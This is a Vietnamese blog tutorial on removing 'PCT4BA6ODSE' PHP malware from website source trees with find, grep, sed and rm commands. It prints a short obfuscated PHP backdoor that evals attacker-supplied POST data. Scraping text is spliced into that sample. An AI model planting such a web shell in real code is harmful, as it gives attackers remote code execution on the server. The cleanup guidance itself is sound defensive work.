Loại bỏ mã độc PCT4BA6ODSE trong mã nguồn

0
1826

Hướng dẫn loại bỏ mã độc “PCT4BA6ODSE ” trong file mã nguồn mà không làm ảnh hưởng đến file. Khi bạn phát hiện loại mã độc này, bạn không thể xóa bỏ theo cách thủ công được được vì mã độc sẽ được chèn vào file, rải rác trong khắp cấu trúc thư mục của bạn hoặc và tập tin mới được tạo ra với kích thước 494 byte, và kết thúc bằng “php”. Mình sẽ nói lần lượt về các trường hợp.

Lưu ý: bạn cần phải dùng lệnh

Để giải quyết vấn đề này thì phải làm tự động thôi => ở đây mình di chuyển vào thư mục chứa mã nguồn (lệnh cd) dùng lệnh find, grep, sed trên linux. Hãy chmod tất cả các file chỉ có quyền đọc (444) để đề phòng lúc đang làm thì nó tiếp tục chèn mã độc vào file.

Thứ 1: mã độc được tạo trong file mới. Tại đây các bạn có thể lấy tìm 1 file, tìm đúng kích cỡ và search theo kích thước bằng lệnh find trên linux. Ví dụ file sẽ có kích thước là 494 byte.

find . -size 494c -name “*.php” -exec grep -l ‘PCT4BA6ODSE_’ {} \;

Sau đó xóa chúng bằng lệnh:

find . -size 494c -name “*.php” -exec grep -l ‘PCT4BA6ODSE_’ {} \; | xargs rm

Thứ 2: loại bỏ mã độc trong file mã nguồn (mã độc được chèn đầu file)

find . -type f -exec grep -l ‘PCT4BA6ODSE_’ {} \;

Lệnh này sẽ kiểm tra toàn bộ của mã nguồn của bạn, tìm kiếm các tập tin bị hack. Sau đó bạn có thể xóa bỏ đoạn mã độc bằng lệnh:

grep -Rl PCT4BA6ODSE . | xargs sed -i ‘s/<[?]php.*PCT4BA6ODSE_.*[?]>//g’

Điều này sẽ quét qua tất cả các tập tin bị ảnh hưởng, loại bỏ các mã độc hại giữ lại mã nguồn còn lại của tập tin.  Nhớ sao lưu hệ thống để đề phòng sai xót.

Ngoài ra, còn dạng mã độc khác:

<?php $qV="stop_";$s20=strtoupper (link is external)($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset (link is external)(${$s20}['q6ae4d5'])){eval (link is external)(${$s20}['q6ae4d5']);}?>

Cũng tạo file mới chứa mã độc và chèn mã độc vào file mã nguồn. Thông thường các file sẽ được tạo, chỉnh sửa trong cùng khoảng thời gian. Ví dụ là ngày 06/12/2014. Nếu đúng như vậy, bạn có thể dùng lệnh:

find . -type f -name '*.php' -newermt 2014-12-06 ! -newermt 2014-12-07 -exec grep -l 'stop_' {} \; | xargs sed -i 's/<[?]php.*stop_.*[?]>//g'
5/5 - (1 bình chọn)

BÌNH LUẬN

Nội dung bình luận
Tên của bạn là gì?